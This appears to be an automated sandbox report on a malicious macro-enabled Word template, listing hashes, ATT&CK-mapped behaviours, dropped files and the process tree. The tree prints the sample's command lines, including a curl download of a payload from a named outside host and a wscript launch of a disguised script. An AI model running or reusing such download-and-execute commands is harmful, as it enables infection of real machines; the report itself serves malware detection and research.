451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f

General

Target

451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f.dotm
Size

21KB
MD5

d382cc7f10fdaec150184941b68cf39e
SHA1

48246205890e1ad8b1d8ceb252f2f79ada5d5750
SHA256

451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f
SHA512

edecc7994edc895af26bb7615216316711ea887260b1108a8cc5fb9d747b1d4fb7d97940ebdc68d202aaf9a173686104627f660800ee73c532a2d14096e8c7ba
SSDEEP

384:tmtGJQNvuJgxw79kY9+zpfcKl2HnQSB6sx9B3dX:q+QhuJgx6k/52HQSBxx9X

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3376	3600	cmd.exe	WINWORD.EXE

Blocklisted process makes network request 1 IoCs

Processes:

wscript.exe

flow pid process

33 1928 wscript.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
33	1928	wscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	cmd.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXEWINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXEWINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings cmd.exe
NTFS ADS 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\~WRD0004.tmp\:Zone.Identifier:$DATA WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener 3 IoCs

Processes:

WINWORD.EXEWINWORD.EXE

pid process

3600 WINWORD.EXE
3600 WINWORD.EXE
4868 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\~WRD0004.tmp\:Zone.Identifier:$DATA	WINWORD.EXE

Suspicious use of SetWindowsHookEx 28 IoCs

Processes:

WINWORD.EXEWINWORD.EXE

pid	process
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
3600	WINWORD.EXE
4868	WINWORD.EXE
4868	WINWORD.EXE
4868	WINWORD.EXE
4868	WINWORD.EXE
4868	WINWORD.EXE
4868	WINWORD.EXE
4868	WINWORD.EXE
4868	WINWORD.EXE
4868	WINWORD.EXE
4868	WINWORD.EXE
4868	WINWORD.EXE
4868	WINWORD.EXE
4868	WINWORD.EXE

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WINWORD.EXEcmd.exe

description	pid	process	target process
PID 3600 wrote to memory of 3376	3600	WINWORD.EXE	cmd.exe
PID 3600 wrote to memory of 3376	3600	WINWORD.EXE	cmd.exe
PID 3376 wrote to memory of 2968	3376	cmd.exe	mode.com
PID 3376 wrote to memory of 2968	3376	cmd.exe	mode.com
PID 3376 wrote to memory of 2740	3376	cmd.exe	curl.exe
PID 3376 wrote to memory of 2740	3376	cmd.exe	curl.exe
PID 3376 wrote to memory of 4868	3376	cmd.exe	WINWORD.EXE
PID 3376 wrote to memory of 4868	3376	cmd.exe	WINWORD.EXE
PID 3376 wrote to memory of 1928	3376	cmd.exe	wscript.exe
PID 3376 wrote to memory of 1928	3376	cmd.exe	wscript.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\451f50db8bc6719f3d34abc3ee3b907ac999c4139b58cab91066248d3b04c80f.dotm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\Microsoft\Templates\version.bat
2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3376

C:\Windows\system32\mode.com
mode 15,1
3⤵
PID:2968

C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Local\Temp\temp.docx" http://eum-it.co.kr/gnuboard4/bbs/img/upload/temp.docx
3⤵
PID:2740

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\temp.docx" /o ""
3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4868

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Templates\version.bat?.wsf"
3⤵
- Blocklisted process makes network request
PID:1928

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

4

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db-wal
Filesize
8KB

MD5
233e91d650ffd99eccc7f8a742d79eb3

SHA1
0bbe6636a6a680b84d968b01d0a0ad2f4882c395

SHA256
3e236b93ca038025e168d9ef4c574d29b9152d6b4dbf11b877ac7244544ef818

SHA512
8dbe559d6ce90033fe1a3f4263f66ef9c8ed461a1a7b4bf5e76e762c8194461e27edc00b3324b953299b5cb7329d6a8d6c53e10db2b3e8c35282f4e89d173b63

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.docx
Filesize
1KB

MD5
467ff0b53d41344aa0fbed2df4b25582

SHA1
0c910f3303865ad0813d31253fe4e2f1b7dc5a03

SHA256
15363ec11808c03d6b535861011059b30bd133128f22084b0308b72b59eb76f5

SHA512
eb366f2cbd74c0d7b4bf9e4dbaf6bb5240982ab833966f2f4a0df0af3984da6b0fbdb9e50332451ba5f5015c5f16efe02d1ce87d1daf8fe7ed95cb1c6df3441e

Download Submit
C:\Users\Admin\AppData\Local\Temp\~WRD0004.tmp
Filesize
28KB

MD5
1bc9ac73a2fc0e857c48c385489b6bb0

SHA1
5305c28e86e2c2e757c41a036aad93be76522268

SHA256
294b5d83a673cfac8f8ccd8aeb2bca53f0dce48cc3152a7e92c8f23dc61562b9

SHA512
55d18ce9cd148105a3b67f03bc91c1d90cdf2cfe8c2ec8c344db8cc7237e8620c41a1691ae9c68291d4e0f58e50ff1c918129000d30c4e5c4d786422651d3612

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
Filesize
251B

MD5
31711792923ed8eab176838f4b8744c9

SHA1
08be0cd5967f3aa6828aa0ea71762488d94a240d

SHA256
d046094fb9162cd9a31afca4324007f5acb95f64065a263949b366a4713061c1

SHA512
2b6f566e7d7a8ec6f9a29ad246fa13a405128854748a40f36bc658b044f1b4f8acd1c42f16683fe702d7de3b409e57a6ce7aa00291d03147ef97cd6e9a6560eb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\version.bat
Filesize
393B

MD5
799be50c3436086b45b9e9071243aa59

SHA1
b3f67263e783ffd08fabcb0979ac983c4e1e11ed

SHA256
e762f82693c8b83bac6903db41198429078d50413a319ddb7b3a056ff17e8c1f

SHA512
1c554704f8627fd0ea7294422824527b495cd2dde1ec3a496befb00d3121e31ab1b836b56d81edd2d3c4ac5d2f46d7ebe794864b4be0f6740ac381fba8c54987

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\version.bat
Filesize
393B

MD5
799be50c3436086b45b9e9071243aa59

SHA1
b3f67263e783ffd08fabcb0979ac983c4e1e11ed

SHA256
e762f82693c8b83bac6903db41198429078d50413a319ddb7b3a056ff17e8c1f

SHA512
1c554704f8627fd0ea7294422824527b495cd2dde1ec3a496befb00d3121e31ab1b836b56d81edd2d3c4ac5d2f46d7ebe794864b4be0f6740ac381fba8c54987

Download Submit
memory/3600-136-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmp

Filesize
64KB

Download
memory/3600-139-0x00007FFB9A930000-0x00007FFB9A940000-memory.dmp

Filesize
64KB

Download
memory/3600-138-0x00007FFB9A930000-0x00007FFB9A940000-memory.dmp

Filesize
64KB

Download
memory/3600-137-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmp

Filesize
64KB

Download
memory/3600-133-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmp

Filesize
64KB

Download
memory/3600-135-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmp

Filesize
64KB

Download
memory/3600-134-0x00007FFB9D030000-0x00007FFB9D040000-memory.dmp

Filesize
64KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads